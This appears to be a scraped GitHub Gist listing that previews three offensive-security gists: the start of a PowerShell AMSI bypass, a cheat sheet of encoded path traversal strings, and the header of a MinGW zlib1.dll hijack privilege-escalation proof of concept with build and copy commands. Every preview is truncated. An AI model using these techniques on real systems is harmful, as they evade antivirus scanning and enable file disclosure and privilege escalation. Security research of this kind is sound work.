Philipp Rieth PhilippRieth
FatRodzianko
/ my-am-bypass.ps1
Last active
February 7, 2025 22:31
small modification to Rastemouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Win32 = @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class Win32 { | |
| [DllImport("kernel32")] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
| [DllImport("kernel32")] |
SleepyLctl
/ Linux Path Traversal Cheatsheet
Created
July 30, 2017 11:03
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Encoded Traversal Strings: | |
| ../ | |
| ..\ | |
| ..\/ | |
| %2e%2e%2f | |
| %252e%252e%252f | |
| %c0%ae%c0%ae%c0%af | |
| %uff0e%uff0e%u2215 |
felmoltor
/ zlib1.dll.cpp
Last active
February 29, 2024 06:55
Privilege escalation with DLL Hijack of zlib1.dll on a MinGW default installation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Author: Felipe Molina (@felmoltor) | |
| // | |
| // MinGW DLL Hijack Privilege Escalation POC. | |
| // This dll will suplantate the legitimate library "zlib1.dll" residing inside | |
| // the default installation folder of MinGW "C:\MinGW\bin\zlib1.dll" | |
| // | |
| // g++ -c -DPRIVESC_DLL mingwprivesc.dll.cpp & g++ -shared -o mingwprivesc.dll mingwprivesc.dll.o -Wl,--out-implib,main.a & copy /y mingwprivesc.dll C:\MinGW\bin\zlib1.dll |